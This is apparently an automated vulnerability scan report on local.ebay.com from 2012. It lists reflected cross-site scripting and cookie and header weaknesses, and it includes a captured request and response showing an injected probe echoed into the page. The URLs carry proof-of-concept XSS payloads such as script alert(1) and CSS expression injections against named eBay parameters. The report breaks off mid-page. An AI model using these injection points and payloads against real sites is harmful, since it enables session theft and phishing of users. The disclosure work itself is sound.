XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, local.ebay.com

Reported to eBay Security

Report generated by XSS.Cx at Sun Jan 15 05:51:18 CST 2012.



1. Cross-site scripting (reflected)

1.1. http://local.ebay.com/local/localsch.html [REST URL parameter 1]

1.2. http://local.ebay.com/local/localsch.html [REST URL parameter 2]

1.3. http://local.ebay.com/local/localsch.html [_nkw parameter]

1.4. http://local.ebay.com/local/localsch.html [name of an arbitrarily supplied request parameter]

2. Cookie scoped to parent domain

2.1. http://local.ebay.com/

2.2. http://local.ebay.com/%22http:/

2.3. http://local.ebay.com/%22https:/

2.4. http://local.ebay.com/Netsparker8fb01a92c9ab454dac239bbf4eea9670

2.5. http://local.ebay.com/Netsparkercafcc364b74d42e78e11240bb32f4487

2.6. http://local.ebay.com/Netsparkerda2c171579864172a93a0dee2635cf81/

2.7. http://local.ebay.com/Netsparkerfef19f760fcf485390b22c198f57cfa9

2.8. http://local.ebay.com/favicon.ico

2.9. http://local.ebay.com/html

2.10. http://local.ebay.com/html/

2.11. http://local.ebay.com/html/disclaimer.html

2.12. http://local.ebay.com/html/disclaimer.html.nsx

2.13. http://local.ebay.com/local

2.14. http://local.ebay.com/local/

2.15. http://local.ebay.com/local/images.i

2.16. http://local.ebay.com/local/images.i

2.17. http://local.ebay.com/local/localsch.html

2.18. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C

2.19. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C/

2.20. http://local.ebay.com/local/localsch.html-_nkw=xss3e2e4%22style%3d%22x%3aexpression%28alert%281%29%29%2277a49c5d808&_location=75217&_fpos=75217&_trksid=p5791.m1

2.21. http://local.ebay.com/server-info

2.22. http://local.ebay.com/server-status

3. Cookie without HttpOnly flag set

3.1. http://local.ebay.com/

3.2. http://local.ebay.com/%22http:/

3.3. http://local.ebay.com/%22https:/

3.4. http://local.ebay.com/Netsparker8fb01a92c9ab454dac239bbf4eea9670

3.5. http://local.ebay.com/Netsparkercafcc364b74d42e78e11240bb32f4487

3.6. http://local.ebay.com/Netsparkerda2c171579864172a93a0dee2635cf81/

3.7. http://local.ebay.com/Netsparkerfef19f760fcf485390b22c198f57cfa9

3.8. http://local.ebay.com/favicon.ico

3.9. http://local.ebay.com/html

3.10. http://local.ebay.com/html/

3.11. http://local.ebay.com/html/disclaimer.html

3.12. http://local.ebay.com/html/disclaimer.html.nsx

3.13. http://local.ebay.com/local

3.14. http://local.ebay.com/local/

3.15. http://local.ebay.com/local/images.i

3.16. http://local.ebay.com/local/images.i

3.17. http://local.ebay.com/local/localsch.html

3.18. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C

3.19. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C/

3.20. http://local.ebay.com/local/localsch.html-_nkw=xss3e2e4%22style%3d%22x%3aexpression%28alert%281%29%29%2277a49c5d808&_location=75217&_fpos=75217&_trksid=p5791.m1

3.21. http://local.ebay.com/server-info

3.22. http://local.ebay.com/server-status

4. Cross-domain Referer leakage

4.1. http://local.ebay.com/

4.2. http://local.ebay.com/local

4.3. http://local.ebay.com/local/

4.4. http://local.ebay.com/local/localsch.html

4.5. http://local.ebay.com/local/localsch.html

4.6. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C

4.7. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C/

4.8. http://local.ebay.com/local/localsch.html-_nkw=xss3e2e4%22style%3d%22x%3aexpression%28alert%281%29%29%2277a49c5d808&_location=75217&_fpos=75217&_trksid=p5791.m1

5. Cross-domain script include

5.1. http://local.ebay.com/

5.2. http://local.ebay.com/%22http:/

5.3. http://local.ebay.com/%22https:/

5.4. http://local.ebay.com/Netsparker8fb01a92c9ab454dac239bbf4eea9670

5.5. http://local.ebay.com/Netsparkercafcc364b74d42e78e11240bb32f4487

5.6. http://local.ebay.com/Netsparkerfef19f760fcf485390b22c198f57cfa9

5.7. http://local.ebay.com/html

5.8. http://local.ebay.com/html/

5.9. http://local.ebay.com/local

5.10. http://local.ebay.com/local/

5.11. http://local.ebay.com/local/localsch.html

5.12. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C

5.13. http://local.ebay.com/local/localsch.html-_nkw=xss&_location=75217&_fpos=75217&_trksid=p5791.m1&dc13b%22%3E%3Cscript%3Ealert%281%29%3C/

5.14. http://local.ebay.com/local/localsch.html-_nkw=xss3e2e4%22style%3d%22x%3aexpression%28alert%281%29%29%2277a49c5d808&_location=75217&_fpos=75217&_trksid=p5791.m1

5.15. http://local.ebay.com/server-info

5.16. http://local.ebay.com/server-status

6. Email addresses disclosed

6.1. http://local.ebay.com/html/disclaimer.html

6.2. http://local.ebay.com/local/disclaimer.html

7. Content type is not specified



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://local.ebay.com/local/localsch.html [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /local/localsch.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75826"><a>c9f6e0b2011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /local75826"><a>c9f6e0b2011/localsch.html?_nkw=rxss&_fpos=75217&_flprad=25.0&_fspt=1 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac8b4030
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpPeYWM4YjQwMzAxMzQwYTAyYTA5NTFmZTYxZmZmZmUzOGQA7gBsTwaT3mh0dHA6Ly9sb2NhbC5lYmF5LmNvbTo4MC9sb2NhbDc1ODI2Ij48YT5jOWY2ZTBiMjAxMS9sb2NhbHNjaC5odG1sP19ua3c9cnhzcyZfZnBvcz03NTIxNyZfZmxwcmFkPTI1LjAmX2NhdGlkPYnO8rU*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0PeYWM4YjQwMzAxMzQwYTAyYTA5NTFmZTYxZmZmZmUzOGQAywABTwVJZjEH2XkF; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:25:34 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 29145
Date: Thu, 05 Jan 2012 06:25:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - rxss</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;margin:10px 0 0} .srpi {width:411px} .srpi input{width:295px;} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325719836074" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325719836074;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AD1WaLJI*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div id="LeftNav" class="lnav">
<!-- <fontT><h1 class="locs">Local Shopping</h1></fontT> -->
<a href="/local" class="locs">
   <img src="/local/images.i?file=LocalShoppingRibbon.png" />
   </a>
<!-- <form action="/localsch.html" name="distanceForm" id="distanceForm" class="sForm">-->
<div name="distanceForm" id="distanceForm" class="sForm">
   
           <input class="zipcode" autocomplete="off" name="_location" id="_location" value=", 75217">
           <div id="autocomplete" class="autocomplete"></div>
       
    <input type="hidden" id="_fpos" name="_fpos" value="75217">
        <input name="zipSub" type="button" value="" class="disSub">
        <div class="clr"></div>
<!-- <div class="cnz">
   <div id="citystate" style="float:left">, 75217</div>
   <div class="pd" style="float:left"></div>
   <div style="clear:both"></div>
   
</div> -->
<input type="hidden" id="zip" value="75217">
<!--<input name="_fpos" id="_fpos" value="75217" maxlength="5"></span> <input type="submit" value="" class="disSub">-->
   <div class="horizontal_track">
   <div class="horizontal_slit">
       <div id="progress" class="slider_bar" style="width:121.8px">&nbsp;</div>
   </div>
   <div class="simg" id="slider" style="left:91px" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">
       <div id="display" class="disp" onmousedown="slide(event, 'slider', -16, 128, 'display', 'progress', 12);">25 miles</div>
       <input type="hidden" value="25" name="_flprad" id="_flprad">
       </div>
   </div>
   </div>
<div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding : 5px 0 0 10px"><a style="font-size:13px;font-weight:bold;color:#002398;display:none" href="/local/localsch.html?_nkw=rxss&amp;_fpos=75217&amp;_inclfltr=1" id="clr" name="clrfltr">Clear all refinements</a></div><div style="padding:5px 0 5px 10px;font-family:Arial;font-weight:bold;font-size:12px;color:#333333"><h4 style=" margin: 0 0 10px;">By Price :</h4><div id="pFil"><span style="padding-right:5px;">$</span><input type="text" id="_sp" name="_sp" size="3" value="" style="margin:0;"><span style="padding: 0 5px;">to $</span><input id="_ep" name="_ep" type="text" size="3" value="" style="margin:0 3px 0 0;"><input type="button" class="disSub disSubDis" name="bP" id="bP" value=""></div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div><div class="ifltr-W">
   <h4 class="ifltr-hdr">Include only</h4>
   
   <div class="ifltr-lst">
       <ul>
           <li>
               <input type="radio" name="inclFltr" checked=checked value="1">
               <span>Local Retailers</span>
           </li>
           <li>
               <input type="radio" name="inclFltr" value="0">
               <span>eBay Sellers</span>
           </li>            
       </ul>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div>    
   
   
       <div class="cat-W">
           <H4 class="cat-hdr">By Category</H4>
           <div class="cat-lst">
               <ul id="parUl">
                   
                   <li>
                   
                       
                       <a href="javascript:;" clk="1" class="ch"></a><a href="http://local.ebay.com:80/local75826"><a>c9f6e0b2011/localsch.html?_fspt=1&_catid=12576&_flprad=25.0&_nkw=rxss&_fpos=75217">Business & Industrial</a>                        
                                   
                       
                           <ul class="dn">
                               
                                   <li>                                        
                                       <a href="http://local.ebay.com:80/local75826"><a>c9f6e0b2011/localsch.html?_fspt=1&_catid=11765&_flprad=25.0&_nkw=rxss&_fpos=75217">Construction </a>                                        
                                   </li>
                               
                           </ul>
                       
                       
                   </li>
                   
                   
               </ul>
           </div>
       </div>

       </div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div>
<div class="fltr-W">
   <h4 class="fltr-hdr">BRAND</h4>
   <div class="fltr-lst">    
        <div name="filterForm" id="filterForm" style="max-height:250px;overflow:hidden">
           <div style="position:absolute;width:5px;right:5px;top:0;height:100%;z-index:1;">
                       <div id="dragelm" style="position: absolute; display:none;width: 5px; height: 30px; background: none repeat scroll 0% 0% #333; right: 0pt; top: -1px; left: 0px;">
                       </div>
           </div>
           <ul id="brandUl">            
               
               

               <li>                            
                        <div class="cb">    
                           <a href="javascript:;" title="Roxul" brand="Roxul" class=" ">Roxul</a>
                        </div>    
                       
               </li>

           
                       
           </ul>
       </div>
   </div>
</div></div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div id="fs">
<h4 class="fsHeader">Local Retailers :</h4><div class="fs" id="fs">
<span class="preS"><a class="pre db" id="pre" href="javascript:;"></a></span>
<div class="cntWrap" id="cntWrap">
<div class="cnt" id="cnt"><a href="javascript:;" title="Lowe's"><img class="" src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" merchant="4483" en="1" /><div class="msk"></div></a>
</div>
</div><span class="nextS"><a class="next db " id="next" href="javascript:;"></a></span>
<div class="clr"></div>
</div>
</div><div style="height:1px;background-color:#CCC;margin:15px 5px 5px"></div><div style="padding:5px 0 10px 20px"><a href="http://www.ebay.com/sch/i.html?_nkw=rxss" target="blank" style="font-size:13px;font-weight:bold;color:#003dac;">View results on ebay.com</a></div></div><div class="cont"><div style="float:left"><div>

<div class="srpbx1">
       <form action="/local/localsch.html" method="get" onsubmit="return vjo.ebay.local.LocalLandingPage.onSubmit();">
           <div>
               <div style="float:right">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi srchbox">
                   <input type="text" id="txt" name="_nkw" placeholder="Search locally " value='rxss' autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               
               
               
               
                   <input type="hidden" value="75217" name="_fpos">
               
               
               
                   <input type="hidden" value="rxss" name="_odkw">
                   
                                                                                   
           </div>
       </form>
</div></div><div id="localResults" class="results"><div id="LocalProductResultSet" class="bgshd"><div><div style="padding:5px; background-color:#F5F5F5" tt="140"><div style="font-size: 13px; font-family: Arial; padding: 3px 0 0 0; color: #333333;float:left">2 results found</div><div><div class="toppg" id="v4-37">
       <div>Page <b>1</b> of <b>1</b></div>
       <span>
           <a class="toppg-p toppg-pd" id="pg-p" type="prev" enabled="false">
           </a>
       </span>
       <span>
           <a class="toppg-n toppg-nd" href="javascript:;" id="pg-n" type="next" enabled="false">
           </a>
       </span>
</div></div><div style="margin-top:2px; float:right"><div></div><div style="clear:both"></div></div><div style="clear:both"></div></div></div><div>
<div class="lstWrap" id="lstWrap">

<div class="lst" type="products" id="item_1" offers="8679175">
<table cellspacing="0" cellpadding="0" border="0">
   <tr class="lstTr">
       <td class="imgContTd">
           <a href="javascript:;">
               <img width="140" height="140" border="0" alt="TEST TUBE WONDERS" src="http://imagethumbnails.milo.com/008/679/624/200/8679175_9912624_200.jpg" />
           </a>
       </td>
       <td>
           <div class="lstInfo">
               <div class="ttlDiv"><a class="ttl" target="_blank" title='Roxul 8-Pack 23"W x R-0 Fiberglass Insulation Batts' href="http://www.ebay.com/ctg/mp.html?_flppid=7641623&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m2&_fpos=75217">Roxul 8-Pack 23"W x R-0 Fiberglass Insulation Batts</a></div>
               <div><span class="rw" style="height: 12px; background-position: 0pt -10px;">
<span class="rstar" style="height: 12px; background-position: 0pt 1px; width: 67.5px"></span>
</span><span class="revCnt">(6)</span></div>
               <div class="retTtl"><span class="catTtl">Carried at 1 retailer</span></div>
               <div class="brandDiv">
                       
                       <a href="javascript:;" storetype="storeicon" mid="4483"><img src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" class="st-img" /></a>
                   
               </div>        
           </div>
       </td>
       <td class="priTd">
           <div class="priDiv">
               N/A
           </div>
       </td>
   </tr>
</table>
<div class="beak"></div>
</div>    

<div class="lst" type="products" id="item_2" offers="10585778">
<table cellspacing="0" cellpadding="0" border="0">
   <tr class="lstTr">
       <td class="imgContTd">
           <a href="javascript:;">
               <img width="140" height="140" border="0" alt="TEST TUBE WONDERS" src="http://imagethumbnails.milo.com/010/585/025/200/10585778_13912025_200.jpg" />
           </a>
       </td>
       <td>
           <div class="lstInfo">
               <div class="ttlDiv"><a class="ttl" target="_blank" title='Roxul 12-Pack 15.25"W x R-0 Fiberglass Insulation Batts' href="http://www.ebay.com/ctg/mp.html?_flppid=9436383&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m2&_fpos=75217">Roxul 12-Pack 15.25"W x R-0 Fiberglass Insulation Batts</a></div>
               <div><span class="rw" style="height: 12px; background-position: 0pt -10px;">
<span class="rstar" style="height: 12px; background-position: 0pt 1px; width: 67.5px"></span>
</span><span class="revCnt">(10)</span></div>
               <div class="retTtl"><span class="catTtl">Carried at 1 retailer</span></div>
               <div class="brandDiv">
                       
                       <a href="javascript:;" storetype="storeicon" mid="4483"><img src="http://static.milo.com/20111201145320/images/store_icons/flat_by_id/4483.png" class="st-img" /></a>
                   
               </div>        
           </div>
       </td>
       <td class="priTd">
           <div class="priDiv">
               N/A
           </div>
       </td>
   </tr>
</table>
<div class="beak"></div>
</div>    

<div id="lstloading" class="lst-load"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div>    
</div>
</div><div><div style="padding:5px; background-color:#F5F5F5"><div><div class="toppg" id="v4-37">
       <div>Page <b>1</b> of <b>1</b></div>
       <span>
           <a class="toppg-p toppg-pd" id="pg-p" type="prev" enabled="false">
           </a>
       </span>
       <span>
           <a class="toppg-n toppg-nd" href="javascript:;" id="pg-n" type="next" enabled="false">
           </a>
       </span>
</div></div><div style="margin-top:10px;font-size:11px;">Pricing &amp; inventory <a target="blank" href="/html/disclaimer.html">subject to Terms</a></div><div style="clear:both"></div></div></div></div></div></div><div id="map-prev" class="map"></div><div class="clr"></div></div><div class="srpLoad" id="srploading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif"></div><div class="clr"></div></div><div class="footer" style="width:755px;"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td class="g-pipe"><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="10" width="1" alt=""><br><a href="http://www.ebayinc.com" _sp="m571.l2602">About eBay</a> | <a href="http://pages.ebay.com/securitycenter/index.html" _sp="m571.l2616">Security Center</a> | <a href="http://pages.ebay.com/buy/tools.html" _sp="m571.l2603">Buyer Tools</a> | <a href="http://pages.ebay.com/help/policies/overview.html" _sp="m571.l2604">Policies</a> | <a href="http://stores.ebay.com/" _sp="m571.l2605">Stores</a> | <a href="http://my.ebay.com/wishlistsearch" _sp="m571.l2898">eBay Wish list</a> | <a 